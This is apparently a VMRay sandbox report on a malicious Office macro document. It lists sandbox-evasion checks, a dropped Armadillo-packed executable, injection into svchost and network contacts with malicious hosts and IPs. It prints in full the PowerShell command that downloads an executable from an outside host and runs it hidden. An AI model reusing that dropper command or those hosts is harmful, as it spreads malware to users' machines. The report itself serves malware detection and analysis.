Word Doc. Drops Context Aware Payload | VTI by Category
Try VMRay Analyzer
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 30
VTI Rule Type Documents
Detected Threats
Arrow Anti Analysis
Arrow
Try to detect application sandbox
Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll".
Possibly trying to detect "Threatexpert" by checking for existence of module "dbghelp.dll".
Arrow
Try to detect forensic tool
Check the existence of DLL "SunBelt Sandbox".
Check the existence of DLL "Winsock Packet Editor".
Arrow File System
Arrow
Handle with malicious files
File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is a known malicious file.
Arrow Injection
Arrow
Write into memory of another process
"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" modifies memory of "c:\windows\system32\svchost.exe"
Arrow Network
Arrow
Download data
URL "www.events4u.cz/kas23.png".
URL "myexternalip.com/raw".
URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
Arrow
Perform DNS request
Resolve host name "www.events4u.cz".
Arrow
Check external IP address
Check external IP by asking IP info service at "myexternalip.com/raw".
Arrow
Connect to remote host
Outgoing TCP connection to host "93.185.102.11:80".
Arrow
Connect to HTTP server
URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
URL "myexternalip.com/raw".
URL "212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/".
URL "www.events4u.cz/kas23.png".
Arrow PE
Arrow
Execute dropped PE file
Execute dropped file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
Arrow
Drop PE file
Drop file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
Arrow
PE file is packed
File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is packed with "Armadillo v1.71".
File "\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" is packed with "Armadillo v1.71".
Arrow Process
Arrow
Create process
Create process "cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"".
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat".
Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe".
Create process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe".
Create process "svchost.exe".
Arrow
Read from memory of another process
"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" reads from "svchost.exe".
Arrow
Execute encoded PowerShell script
Execute encoded PowerShell script to possibly hide malicious payload.
Arrow
Create system object
Create mutex with name "Global\.net clr networking".
Create mutex with name "Global\VLock".
Arrow VBA Macro
Arrow
Execute application
Shell myform1.TextBox2, 0
Arrow
Execute macro on specific worksheet event
Execute macro on "Activate Workbook" event.
- Browser
- Device
- OS
- Hide Tracks
- Information Stealing
- Kernel
- Masquerade
- Persistence
- User
- YARA
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image